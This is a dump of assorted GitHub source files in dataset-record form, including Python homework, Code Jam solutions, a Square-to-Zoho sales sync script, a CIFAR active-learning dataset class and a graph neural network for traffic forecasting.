** 0.5) / (2 * a_cft)\n return x1, x2\n\n\ndef main():\n # print(square_eq_root(-1.54, 4.467, 9.188))\n gen_csv_rand_nums(SRC_FILE_NAME, tst_mode=False)\n results = square_eq_root()\n print('|{:^7}|{:^10}|{:^10}|{:^10}||{:^20}|'.format(*results[0]))\n print('-' * 64)\n for row in results[1:]:\n print('|{:^7}|{:<10}|{:<10}|{:<10}||{:^20}|'.format(*map(\n lambda x: x if isinstance(x, str) else str((round(x[0], 3), round(x[1], 3)))\n if isinstance(x, tuple) else str(round(x, 3)), row)))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"BeliaevAndrey/Python-II-Homeworks","sub_path":"homework_09/hw09_task02/hw09_task02.py","file_name":"hw09_task02.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23587791201","text":"import operator\nt = int(input())\n\nfor i in range(t):\n s = input().split(\" \")\n ac = int(s[0])\n aj = int(s[1])\n\n activities = []\n ctot = 0\n jtot = 0\n\n for _ in range(ac):\n s = input().split(\" \")\n start = int(s[0])\n end = int(s[1])\n activities.append((start, end, \"cameron\"))\n ctot+=end-start\n\n for _ in range(aj):\n s = input().split(\" \")\n start = int(s[0])\n end = int(s[1])\n activities.append((start, end, \"jamie\"))\n jtot+=end-start\n\n activities.sort(key=operator.itemgetter(0))\n\n cgaps=[]\n jgaps=[]\n\n\n for j in range(len(activities)):\n current = activities[j]\n adjacent = activities[(j+1)%len(activities)]\n if current[2] == \"cameron\" and adjacent[2]==\"cameron\":\n cgaps.append((adjacent[0]-current[1])%(60*24)) \n if current[2] == \"jamie\" and adjacent[2]==\"jamie\":\n jgaps.append((adjacent[0]-current[1])%(60*24))\n\n cgaps.sort()\n jgaps.sort()\n\n cskip=0\n jskip=0\n\n while cgaps and ctot+cgaps[0] <= 720:\n ctot+=cgaps[0]\n cgaps.pop(0)\n cskip+=1\n while jgaps and jtot+jgaps[0] <= 720:\n jtot+=jgaps[0]\n jgaps.pop(0)\n jskip+=1\n\n\n swaps = 0\n for j in range(len(activities)):\n current = activities[j]\n adjacent = activities[(j+1)%len(activities)]\n if current[2] == \"cameron\" and adjacent[2]==\"cameron\":\n if cskip > 0:\n cskip-=1\n else:\n swaps+=2\n elif current[2] == \"jamie\" and adjacent[2]==\"jamie\":\n if jskip > 0:\n jskip-=1\n else:\n swaps+=2\n else:\n swaps+=1\n\n print(\"Case #{}: {}\".format(i+1, swaps))","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_210/38.py","file_name":"38.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"69986872194","text":"import sys\n\n\ndef are_unexplored_edges(ue):\n flag = False\n for u in ue:\n if ue[u]:\n flag = True\n return flag\n\n\ndef random_walk(start, al, ue):\n # cyclic walk\n cycle = [start]\n v = start\n while True:\n u = cycle[-1]\n for i in range(len(al[u])):\n if i in ue[u]:\n v = al[u][i]\n ue[u].remove(i)\n cycle.append(v)\n break\n if v == start:\n break\n return cycle\n\n\ndef eulerian_cycle(adj_list):\n start = min(adj_list.keys())\n unexplored_edges = {u: set(range(len(adj_list[u]))) for u in adj_list}\n # initial cycle\n cycle = random_walk(start, adj_list, unexplored_edges)\n while are_unexplored_edges(unexplored_edges):\n for i in range(len(cycle)):\n u = cycle[i]\n if unexplored_edges[u]:\n start = u\n new_cycle = random_walk(start, adj_list, unexplored_edges)\n cycle = cycle[:i] + new_cycle + cycle[i+1:]\n return cycle\n\n\ndef main():\n adj_list = dict()\n for line in sys.stdin:\n line = line.strip()\n tail, head = line.split(' -> ')\n adj_list[int(tail)] = list(map(int, head.split(',')))\n cycle = eulerian_cycle(adj_list)\n print('->'.join(map(str, cycle)))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Leoberium/BA","sub_path":"Chapter3/BA3F.py","file_name":"BA3F.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40770814371","text":"import arduinoSerial\nimport time \ndef setupSerial():\n global arduino\n arduino=arduinoSerial.Arduino(115200,'*',0)\n\ndef run():\n while True:\n print(\"Getting Data\")\n arduino.serWrite('g')\n a =arduino.serRead()\n print(a)\n time.sleep(.5)\n\n\t\nif __name__ == \"__main__\":\n setupSerial()\n run()\n\n\n\t\n","repo_name":"sumij95/marsrover_2018","sub_path":"Temperature/serial_test.py","file_name":"serial_test.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"362454821","text":"from scopus_publication import ScopusPublication\nfrom rake_nltk import Rake\nfrom shutil import copyfile\nimport os\n\nsource_folder = ''\noutput_folder = ''\nstudies_folder = ''\n\nfor file in os.listdir(output_folder):\n if file != '.DS_Store':\n pub = ScopusPublication(output_folder, file)\n \n pub.abstract = pub.abstract.encode('ascii', 'ignore') \n if pub.abstract != '':\n keywords_file = os.path.join(output_folder, file, 'rake_keywords.txt')\n \n if not os.path.exists(keywords_file):\n try:\n r = Rake()\n r.extract_keywords_from_text(pub.abstract)\n keywords = r.get_ranked_phrases()\n \n if len(keywords) > 0:\n with open(keywords_file, 'w') as o:\n for keyword in keywords:\n o.write(keyword)\n o.write('\\n')\n except:\n pass","repo_name":"janinaj/lit-review-search","sub_path":"keywords.py","file_name":"keywords.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"72773416193","text":"\nimport logging\nimport torch\nimport numpy as np\nfrom tqdm import tqdm\n\nLOGGER = logging.getLogger(__name__)\n\ndef freeze_batch_norm_layers(model):\n for name, mod in model.named_modules():\n if isinstance(mod, torch.nn.BatchNorm2d):\n mod.eval()\n\n\ndef train_classification_model(model, optimizer, criterion, trainloader, device,\n verbose=True, max_batches=None, freeze_batch_norm=False):\n \n \"\"\"\n Parameters\n ----------\n device: torch.device\n Choose between cuda or cpu.\n model: torch.nn.Module\n A pytorch network model.\n optimizer: torch.optim.Optimizer\n A pytorch optimizer like Adam.\n criterion: torch.nn.Loss\n A pytorch criterion that defines the loss.\n trainloader: torch.utils.data.DataLoader\n Loader of train data.\n max_batches: int\n How many batches the model should train for.\n verbose: bool\n If True, print text - verbose mode.\n freeze_batch_norm: bool\n If True set batch norm layers to eval. Default: False\n\n Returns\n -------\n success: bool\n Returns False is nans encountered in the loss else True.\n \"\"\"\n model.to(device)\n model.train()\n if freeze_batch_norm:\n freeze_batch_norm_layers(model)\n\n train_loss = []\n correct = 0\n total = 0\n\n total_iterations = max_batches or len(trainloader)\n iterator = tqdm(enumerate(trainloader), total=total_iterations, position=0, leave=True, desc='train_classification') \\\n if verbose else enumerate(trainloader)\n\n for batch_idx, (inputs, targets) in iterator:\n\n inputs, targets = inputs.to(device), targets.to(device)\n optimizer.zero_grad()\n outputs = model(inputs)\n\n loss = criterion(outputs, targets)\n\n if torch.isnan(loss):\n LOGGER.warning('--> Loss is Nan.')\n break\n\n loss.backward()\n optimizer.step()\n train_loss.append(loss.item())\n\n _, predicted = outputs.max(1)\n\n total += targets.size(0)\n correct += predicted.eq(targets).sum().item()\n\n if batch_idx == max_batches:\n break\n\n acc = correct * 100.0 / total\n mean_train_loss = np.mean(train_loss)\n \n return acc, mean_train_loss\n##################################################################","repo_name":"jihyounchoi/vanilla-nerf-model-compression-using-lsa-enhanced-nncodec","sub_path":"framework/applications/utils/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2318,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"23395504621","text":"import math\n\nf = open(\"C.txt\", 'w')\n\ndef ispalin(k):\n\tk = str(k)\n\tif (k == k[::-1]):\n\t\treturn True\n\treturn False\n\ndef answer(a, b):\n\tc = 0\n\tk = int(math.sqrt(a))\n\tif (k*k < a):\n\t\tk += 1\n\twhile (k*k <= b):\n\t\tif (ispalin(k) and ispalin(k*k)):\n\t\t\tc += 1\n\t\t\t#f.write(str(k))\n\t\t\t#f.write(' ')\n\t\t\t#f.write(str(k*k))\n\t\t\t#f.write('\\n')\n\t\tk += 1\n\treturn c\n\nt = int(raw_input())\nans = []\nfor i in range(0, t):\n\tr = map(int, raw_input().split())\n\tans.append(answer(r[0], r[1]))\n\nfor i in range(0, t):\n\tf.write(\"Case #\")\n\tf.write(str(i+1))\n\tf.write(\": \")\n\tf.write(str(ans[i]))\n\tf.write('\\n')","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_118/2700.py","file_name":"2700.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5961329417","text":"import torch\nimport torchvision\nimport torchvision.transforms as transforms\nfrom torch.utils.data import TensorDataset, Dataset\n\nfrom .active_dataset import ActiveDataset, MaskDataset\nfrom ..helpers.constants import DATA_ROOT\n\nCIFAR100_TRAIN_MEAN = (0.4914, 0.4822, 0.4465)\nCIFAR100_TRAIN_STD = (0.2023, 0.1994, 0.2010)\n\n\nclass TransformedDataset(Dataset):\n\n def __init__(self, dataset, transform=None, target_transform=None):\n self.dataset = dataset\n self.transform = transform\n self.target_transform = target_transform\n\n def __len__(self):\n return len(self.dataset)\n\n def __getitem__(self, i):\n x, y = self.dataset[i]\n if self.transform is not None:\n x = self.transform(x)\n if self.target_transform is not None:\n y = self.target_transform(x)\n return x, y\n\n\nclass CifarDataset(ActiveDataset):\n\n def __init__(self, indices, n_init=100, output_dir=None, train=True, queries_name='queries.txt', size=100):\n self.size = size\n self.init_dataset = self._get_initial_dataset(train)\n super().__init__(self.get_dataset(indices), n_init=n_init,\n output_dir=output_dir, queries_name=queries_name)\n\n def _get_initial_dataset(self, train=True):\n if train:\n transform = transforms.Compose([\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize(CIFAR100_TRAIN_MEAN, CIFAR100_TRAIN_STD)\n ])\n else:\n transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(CIFAR100_TRAIN_MEAN, CIFAR100_TRAIN_STD)\n ])\n if self.size == 100:\n return torchvision.datasets.CIFAR100(\n root=DATA_ROOT, train=train, transform=transform,\n target_transform=None, download=True)\n else:\n return torchvision.datasets.CIFAR10(\n root=DATA_ROOT, train=train, transform=transform,\n target_transform=None, download=True)\n\n def get_dataset(self, indices):\n return MaskDataset(self.init_dataset, indices)\n","repo_name":"kili-technology/active-learning","sub_path":"al/dataset/cifar.py","file_name":"cifar.py","file_ext":"py","file_size_in_byte":2236,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"29115996687","text":"class SquareZoho:\n def __init__(self, van_driver):\n self.aws = zohoapi.get_aws_token()\n self.square = zohoapi.get_s3_file(self.aws['AWS_KEY'],self.aws['SECRET_KEY'], 'square_dict2.json')\n self.square_df = json_normalize(self.square)\n self.square_df['item_id'] = self.square_df['item_id'].astype(str)\n self.zoho_token = zohoapi.get_s3_file(self.aws['AWS_KEY'],self.aws['SECRET_KEY'], 'zoho_token.json')\n self.van = van_driver\n self.vans = {\n 'mauricio':'BSPQ7V58MGQSX',\n 'oscar':'EJCQ7FPG2M4BE',\n 'isaac':'WZFB97FSPZ0MF',\n 'ely':'EW06SGK17B6DH',\n 'eduardo':'DDG5MMMHXCJSA',\n }\n self.van_id = {\n 'BSPQ7V58MGQSX': {'pwh': 1729377000000087009,'cxid': 1729377000003663083, 'whid': 1729377000062698538, 'pfix': 'MAU'},\n 'EJCQ7FPG2M4BE': {'pwh': 1729377000000087009,'cxid': 1729377000062689580, 'whid': 1729377000062698542, 'pfix': 'OSC'},\n 'WZFB97FSPZ0MF': {'pwh': 1729377000000087011,'cxid': 1729377000003663070, 'whid': 1729377000062698546, 'pfix': 'ISA'},\n 'EW06SGK17B6DH': {'pwh': 1729377000000087011,'cxid': 1729377000040623610, 'whid': 1729377000043236430, 'pfix': 'ELY'},\n 'DDG5MMMHXCJSA': {'pwh': 1729377000000087011,'cxid': 1729377000041250719, 'whid': 1729377000043236426, 'pfix': 'EDU'},\n }\n\n def get_square_data(self):\n self.api_instance = Client(access_token=self.zoho_token['SQUARE_KEY'])\n self.body = {\n 'location_ids': [self.vans[self.van]],\n 'query': {\n 'filter': {'date_time_filter': {'created_at': {\n 'start_at': dt.datetime.today().strftime('%Y-%m-%d'),\n 'end_at': (dt.datetime.today() + dt.timedelta(days=1)).strftime('%Y-%m-%d')\n }\n\n }\n }\n },\n 'return_entries': False,\n }\n self.api_response = self.api_instance.orders.search_orders(self.body)\n return json.loads(self.api_response.text)\n\n def remove_return_orders(self,lst, key):\n result = []\n for i, dic in enumerate(lst):\n try:\n if len(dic[key]) > 0:\n result.append(dic)\n except:\n pass #we can use this in the future to get the returns\n return result\n\n def validated_data(self, json_data):\n if len(json_data) != 0:\n dta_tenders = json_normalize(json_data,'tenders',['id'],meta_prefix = 'order_')\n dta_items = json_normalize(json_data,'line_items',['id'],meta_prefix = 'order_')\n data_full = dta_tenders.merge(dta_items,how = 'left',on = ['order_id'])\n data_full = data_full.fillna(0)\n data_full['quantity'] = data_full['quantity'].astype(int)\n return data_full\n return 0\n\n def merge_data(self, df):\n df = df.merge(self.square_df, how='left', left_on='catalog_object_id', right_on='token')\n df.loc[df['catalog_object_id']==0,'item_id'] = '1729377000002073265'\n df.loc[df['catalog_object_id']==0,'qt'] = 1\n df.loc[df['catalog_object_id']==0,'cat'] = 'ZZZ'\n df['item_id'].fillna(0, inplace=True)\n df['qty'] = df['quantity'] * df['qt']\n df['item_total'] = df['gross_sales_money.amount'] / (107 * df['qty'])\n df['discount'] = df['total_discount_money.amount'] / 107\n df['money'] = df['total_money.amount'] / 107\n df['cat2'] = np.where(df['cat']=='ZZZ',1,0)\n df['subtotal'] = df['item_total'] * df['qty']\n df['payment'] = np.where(df['processing_fee_money.amount'] > 0, 'CARD', 'CASH')\n df['created_at'] = df['created_at'].apply(lambda x: parser.parse(str(x)).strftime('%Y-%m-%d'))\n\n v1 = df.loc[df['item_id']==0]['catalog_object_id'].to_list()\n\n return df, v1\n\n def create_dfs(self, df):\n\n try:\n df1 = df.drop_duplicates(subset=['transaction_id','catalog_object_id','gross_sales_money.amount','note'])\n except:\n df1 = df.drop_duplicates(subset=['transaction_id','catalog_object_id','gross_sales_money.amount'])\n\n df2 = df1.groupby(['created_at', 'location_id', 'cat', 'item_id'], as_index=False).agg({\n 'subtotal': sum,\n 'discount': sum,\n 'qty': sum})\n\n df2['price'] = df2['subtotal'] / df2['qty']\n\n df3 = df.groupby(['payment','cat2'], as_index=False).agg({'money': sum})\n df3.cat2 = df3.cat2.astype(str)\n df3.money = df3.money * 1.07\n\n return df1, df2, df3\n\n def payment_const(self):\n try:\n cashp = '$' + str(df3.loc[(df3.payment=='CASH') & (df3.cat2=='1')].money.values[0]) + ' pending'\n except:\n cashp = 'Full Amount'\n\n try:\n ccp = '$' + str(df3.loc[(df3['payment']=='CARD') & (df3['cat2']=='1')].money.values[0]) + ' pending'\n except:\n ccp = 'Full Amount'\n\n try:\n cash0 = df3.loc[(df3.payment=='CASH') & (df3.cat2=='0')].money.values[0]\n except:\n cash0 = 0\n\n try:\n cc0 = df3.loc[(df3.payment=='CARD') & (df3.cat2=='0')].money.values[0]\n except:\n cc0 = 0\n return cashp, ccp, cash0, cc0\n\n def create_so(self, zoho, df):\n line_items = []\n\n for i in range(len(df)):\n line = {\n 'item_id': int(df.item_id[i]),\n 'rate': df.price[i],\n 'discount': df.discount[i],\n 'discount_type': 'item_level',\n 'quantity': int(df.qty[i]),\n 'warehouse_id': self.van_id[df.location_id[i]]['whid'],\n }\n line_items.append(line)\n\n so = parser.parse(df.created_at[0]).strftime('%y%m%d')\n\n data = {\n 'customer_id': int(self.van_id[df.location_id[0]]['cxid']),\n 'salesorder_number': self.van_id[df.location_id[0]]['pfix'] + '-' + so,\n 'date': parser.parse(df.created_at[len(df)-1]).strftime('%Y-%m-%d'),\n 'line_items': line_items,\n 'custom_fields': [{'customfield_id': '1729377000039969865', 'value':'Square'}],\n }\n\n return zoho.create_order(data)\n\n def create_package(self, zoho, r):\n pk_items = []\n for i in range(len(r['salesorder']['line_items'])):\n if r['salesorder']['line_items'][i]['item_id'] != '1729377000002073265':\n pk_line = {'so_line_item_id': r['salesorder']['line_items'][i]['line_item_id'],\n 'quantity': r['salesorder']['line_items'][i]['quantity']\n }\n pk_items.append(pk_line)\n\n pk_data = {\n 'date': r['salesorder']['date'],\n 'line_items': pk_items,\n }\n return zoho.create_package(r['salesorder']['salesorder_id'], pk_data)\n\n def shipment(self, zoho, r):\n shdata = {\n 'shipment_number': r['package']['salesorder_number'],\n 'date': r['package']['salesorder_date'],\n 'delivery_method': 'Van',\n 'tracking_number': '',\n }\n return zoho.create_shipment(r['package']['package_id'], r['package']['salesorder_id'], shdata, True)\n\n def delivered(self, zoho, r):\n return zoho.delivered(r['shipmentorder']['shipment_id'])\n\n def rounding(self, zoho, r, df):\n so = parser.parse(df.created_at[0]).strftime('%y%m%d')\n data = {\n 'customer_id': int(self.van_id[df.location_id[0]]['cxid']),\n 'salesorder_number': self.van_id[df.location_id[0]]['pfix'] + '-' + so,\n 'date': parser.parse(df.created_at[len(df)-1]).strftime('%Y-%m-%d'),\n 'adjustment': round(r['salesorder']['total'],0)-r['salesorder']['total'],\n 'adjustment_description': 'Rounding'\n }\n return zoho.update_order(r['salesorder']['salesorder_id'], data)\n\n def create_invoice(self, zoho, r, df):\n inv_items = []\n for i in range(len(r['salesorder']['line_items'])):\n if r['salesorder']['line_items'][i]['item_id'] != '1729377000002073265':\n inv_line = {'salesorder_item_id': r['salesorder']['line_items'][i]['line_item_id'],\n 'item_id': r['salesorder']['line_items'][i]['item_id'],\n 'quantity': r['salesorder']['line_items'][i]['quantity'],\n 'discount': r['salesorder']['line_items'][i]['discount'],\n 'discount_type': 'item_level',\n 'warehouse_id': self.van_id[df.location_id[0]]['whid'],\n 'rate': r['salesorder']['line_items'][i]['rate'],\n }\n inv_items.append(inv_line)\n inv_data = {\n 'customer_id': r['salesorder']['customer_id'],\n 'date': r['salesorder']['date'],\n 'line_items': inv_items,\n 'adjustment': r['salesorder']['adjustment'],\n 'adjustment_description': r['salesorder']['adjustment_description'],\n }\n return zoho.create_invoice(inv_data)\n\n def create_payment(self, zoho, r, invoice_id, cash0, cashp, cc0, ccp):\n pay_data = [{\n 'customer_id': r['salesorder']['customer_id'],\n 'payment_mode': 'Cash',\n 'amount': cash0,\n 'date': r['salesorder']['date'],\n 'reference_number': cashp,\n 'invoices': [{\n 'invoice_id': invoice_id,\n 'amount_applied': cash0,\n }],\n 'account_id': 1729377000028708216,\n },\n {\n 'customer_id': r1['salesorder']['customer_id'],\n 'payment_mode': 'Credit Card',\n 'amount': cc0,\n 'date': r1['salesorder']['date'],\n 'reference_number': ccp,\n 'invoices': [{\n 'invoice_id': invoice_id,\n 'amount_applied': cc0,\n }],\n 'account_id': 1729377000028708190,\n }]\n\n if cash0 * cc0 == 0:\n if cash == 0:\n return zoho.create_cxpayment(pay_data[1])\n return zoho.create_cxpayment(pay_data[0])\n for i in range(2):\n res = zoho.create_cxpayment(pay_data[i])\n return res\n\n def transfer_order(self, zoho, r, df):\n so = parser.parse(df.created_at[0]).strftime('%y%m%d')\n transfer_items = []\n\n for i in range(len(r['salesorder']['line_items'])):\n tf_items = {\n 'item_id': r['salesorder']['line_items'][i]['item_id'],\n 'name': r['salesorder']['line_items'][i]['name'],\n 'description': r['salesorder']['line_items'][i]['description'],\n 'quantity_transfer': r['salesorder']['line_items'][i]['quantity'],\n }\n transfer_items.append(tf_items)\n\n transfer_data = {\n 'transfer_order_number': self.van_id[df.location_id[0]]['pfix'] + '-' + so,\n 'date': r['salesorder']['date'],\n 'from_warehouse_id': self.van_id[df.location_id[0]]['pwh'],\n 'to_warehouse_id': self.van_id[df.location_id[0]]['whid'],\n 'line_items': transfer_items,\n 'is_intransit_order': True,\n }\n\n return zoho.transfer_order(transfer_data)\n","repo_name":"jesfel/web_tab_test","sub_path":"square2.py","file_name":"square2.py","file_ext":"py","file_size_in_byte":11126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1949304779","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index), #landing page\n path('register', views.register), #registration page\n path('process_registration', views.process_registration), #processes registration form\n path('login', views.login), #login page\n path('process_login', views.process_login), #processes login form\n path('logout', views.logout),\n path('shows/', views.shows), #homepage - lists shows\n path('shows/new', views.shows_new), #form to add a new show\n path('shows/create', views.shows_create), #processes add show, leads to show info\n path('shows/', views.show_info), #path for show's info\n path('add_favorite/', views.add_favorite), #processes favorite(like button)\n path('unfavorite/', views.unfavorite),\n path('process_review/', views.process_review), #processes review form\n path('delete_review//', views.delete_review),\n path('favorite_shows', views.favorite_shows),\n path('shows//edit', views.show_edit), #form to edit show\n path('shows//update', views.show_update), #processes edit show, leads to show info\n path('shows//destroy', views.destroy), #deletes show\n]\n","repo_name":"francesbathan/tv-show-portal","sub_path":"app_shows/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22743913995","text":"import random\nfrom words import word_list\nchosen_word =random.choice(word_list)\n\ndisplay = []\nword_length = len(chosen_word)\nlives = 6\n\nfor letter in range(word_length) :\n display+=\"_\"\nprint(display)\nend_of_game = False\nwhile not end_of_game :\n guess = input(\"Guess a letter\").lower()\n for position in range(word_length):\n letter = chosen_word[position]\n if letter == guess :\n display[position]=letter\n\n print(display)\n if \"_\" not in display :\n end_of_game = True\n print(\"You win\")\n if guess not in chosen_word :\n lives -=1\n if lives == 0 :\n end_of_game = True\n print(\"You Lose\")\n\nprint(f\"answer is {chosen_word}\")","repo_name":"Om334exe/PythonBasicProjects","sub_path":"WordGuessingGame/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"71545102593","text":"#loads files with name 'filename' from start to end\nimport cPickle as pickle\nimport numpy as np\n#from numba import jit\n#\n#@jit(nopython=True)\ndef load_quantity(filename,start,end):\n with open('/Users/iCade/Desktop/CAM/PartIII/PROJECT/python/input/'+filename+'/'+filename+'_0%i' %start, 'rb') as fileObject:\n A = pickle.load(fileObject)[np.newaxis]\n \n \n for j in range(start+1,end+1):\n with open('/Users/iCade/Desktop/CAM/PartIII/PROJECT/python/input/'+filename+'/'+filename+'_0%i' %j, 'rb') as fileObject:\n B = pickle.load(fileObject)\n \n A = np.concatenate((A,B[np.newaxis]),axis=0)\n \n return np.transpose(A,axes=(1,2,0))","repo_name":"harry-rendell/accretion_disk","sub_path":"funcs/load_quantity.py","file_name":"load_quantity.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16049265205","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport sys\n\n# model\nclass nconv(nn.Module):\n def __init__(self):\n super(nconv,self).__init__()\n\n def forward(self,x, A):\n x = torch.einsum('ncvl,vw->ncwl',(x,A))\n return x.contiguous()\n\nclass Aconv(nn.Module):\n def __init__(self):\n super(Aconv,self).__init__()\n\n def forward(self,x, A, shift):\n Align_x = torch.roll(x, shift, dims=2) \n out = torch.zeros_like(x).to(x.device)\n Align_x[...,:shift,:] = out[...,:shift,:] \n x = torch.einsum('ncvl,vw->ncwl',(Align_x,A))\n return x.contiguous()\n\nclass linear(nn.Module):\n def __init__(self,c_in,c_out):\n super(linear,self).__init__()\n self.mlp = torch.nn.Conv2d(c_in, c_out, kernel_size=(1, 1), padding=(0,0), stride=(1,1), bias=True)\n\n def forward(self,x):\n return self.mlp(x)\n\nclass emb_trans(nn.Module):\n def __init__(self, device, n_dim=10):\n super(emb_trans, self).__init__()\n self.w = nn.Parameter(torch.eye(n_dim).to(device), requires_grad=True).to(device)\n self.b = nn.Parameter(torch.zeros(n_dim).to(device), requires_grad=True).to(device)\n def forward(self, nodevec1, nodevec2, n):\n nodevec1 = nodevec1.mm(self.w) + self.b.repeat(n, 1)\n nodevec2 = (nodevec2.T.mm(self.w) + self.b.repeat(n, 1)).T\n return nodevec1, nodevec2\n\nclass Agcn(nn.Module):\n def __init__(self,c_in,c_out,dropout, kernel_size, dilation, device, e_dim=10):\n super(Agcn,self).__init__()\n self.Aconv = Aconv()\n c_in = (1+kernel_size)*c_in\n self.mlp = linear(c_in,c_out)\n self.dropout = dropout\n self.kernel_size = kernel_size\n self.dilation = dilation\n self.e_trans = nn.ModuleList()\n\n for i in range(kernel_size-1):\n self.e_trans.append(emb_trans(device, e_dim))\n\n def forward(self,x, nodevec1, nodevec2):\n out = [x]\n shift = 0\n n = nodevec1.size(0)\n \n adp = F.softmax(F.relu(torch.mm(nodevec1, nodevec2)), dim=1)\n x1 = self.Aconv(x, adp, shift)\n out.append(x1) \n shift = self.dilation\n x2 = x1 \n for i in range(self.kernel_size-1):\n nodevec1, nodevec2 = self.e_trans[i](nodevec1, nodevec2, n)\n adp = F.softmax(F.relu(torch.mm(nodevec1, nodevec2)), dim=1)\n x1 = self.Aconv(x2, adp, shift)\n out.append(x1)\n shift = shift + self.dilation\n x2 = x1 \n h = torch.cat(out,dim=1)\n h = self.mlp(h)\n h = F.dropout(h, self.dropout, training=self.training)\n return h\n\nclass Anet(nn.Module):\n def __init__(self, device, num_nodes, dropout=0.3, aptinit=None, in_dim=2,out_dim=12,\n residual_channels=32,dilation_channels=32,skip_channels=256,end_channels=512,kernel_size=2,blocks=4,layers=2, e_dim=10, kernel_size_Agcn=2):\n super(Anet, self).__init__()\n self.dropout = dropout\n self.blocks = blocks\n self.layers = layers\n\n self.align = nn.ModuleList()\n self.filter_convs = nn.ModuleList()\n self.gate_convs = nn.ModuleList()\n self.residual_convs = nn.ModuleList()\n self.skip_convs = nn.ModuleList()\n self.bn = nn.ModuleList()\n self.gconv = nn.ModuleList()\n self.e_trans = nn.ModuleList()\n\n self.start_conv = nn.Conv2d(in_channels=in_dim,\n out_channels=residual_channels,\n kernel_size=(1,1))\n \n receptive_field = 1\n if aptinit is None:\n self.nodevec1 = nn.Parameter(torch.randn(num_nodes, e_dim).to(device), requires_grad=True).to(device)\n self.nodevec2 = nn.Parameter(torch.randn(e_dim, num_nodes).to(device), requires_grad=True).to(device)\n else:\n m, p, n = torch.svd(aptinit)\n initemb1 = torch.mm(m[:, :e_dim], torch.diag(p[:e_dim] ** 0.5))\n initemb2 = torch.mm(torch.diag(p[:e_dim] ** 0.5), n[:, :e_dim].t())\n self.nodevec1 = nn.Parameter(initemb1, requires_grad=True).to(device)\n self.nodevec2 = nn.Parameter(initemb2, requires_grad=True).to(device)\n\n for b in range(blocks):\n additional_scope = kernel_size - 1\n new_dilation = 1\n for i in range(layers):\n # dilated convolutions\n self.filter_convs.append(nn.Conv2d(in_channels=residual_channels,\n out_channels=dilation_channels,\n kernel_size=(1,kernel_size),dilation=new_dilation))\n\n self.gate_convs.append(nn.Conv1d(in_channels=residual_channels,\n out_channels=dilation_channels,\n kernel_size=(1, kernel_size), dilation=new_dilation))\n\n # 1x1 convolution for residual connection\n self.residual_convs.append(nn.Conv1d(in_channels=dilation_channels,\n out_channels=residual_channels,\n kernel_size=(1, 1)))\n\n # 1x1 convolution for skip connection\n self.skip_convs.append(nn.Conv1d(in_channels=dilation_channels,\n out_channels=skip_channels,\n kernel_size=(1, 1)))\n self.bn.append(nn.BatchNorm2d(residual_channels))\n self.gconv.append(Agcn(residual_channels, dilation_channels, dropout, kernel_size_Agcn, new_dilation,device, e_dim = e_dim))\n self.e_trans.append(emb_trans(device, e_dim))\n \n new_dilation *=2\n receptive_field += additional_scope\n additional_scope *= 2\n \n\n self.end_conv_1 = nn.Conv2d(in_channels=skip_channels,\n out_channels=end_channels,\n kernel_size=(1,1),\n bias=True)\n\n self.end_conv_2 = nn.Conv2d(in_channels=end_channels,\n out_channels=out_dim,\n kernel_size=(1,1),\n bias=True)\n\n self.receptive_field = receptive_field\n\n\n\n def forward(self, input):\n in_len = input.size(3)\n if in_len dilation_channels\n n1, n2 = self.e_trans[i](n1, n2, n)\n ss = ss + x2[:, :, :, -x.size(3):] \n # parametrized skip connection\n \n s = self.skip_convs[i](ss) # skip_channels\n try:\n skip = skip[:, :, :, -s.size(3):]\n except:\n skip = 0\n skip = s + skip\n\n x = self.residual_convs[i](ss)\n x = x + residual[:, :, :, -x.size(3):]\n x = self.bn[i](x)\n\n x = F.relu(skip)\n x = F.relu(self.end_conv_1(x))\n x = self.end_conv_2(x)\n return x\n","repo_name":"chenxino/DTMP","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":7878,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"3538669689","text":"import json\nfrom ibm_watson import NaturalLanguageUnderstandingV1\nfrom ibm_cloud_sdk_core.authenticators import IAMAuthenticator\nfrom ibm_watson.natural_language_understanding_v1 \\\n import Features, EmotionOptions, ConceptsOptions, CategoriesOptions, EntitiesOptions, KeywordsOptions\n \n# 서비스 시작이 얻는 API Key 입력\nauthenticator = 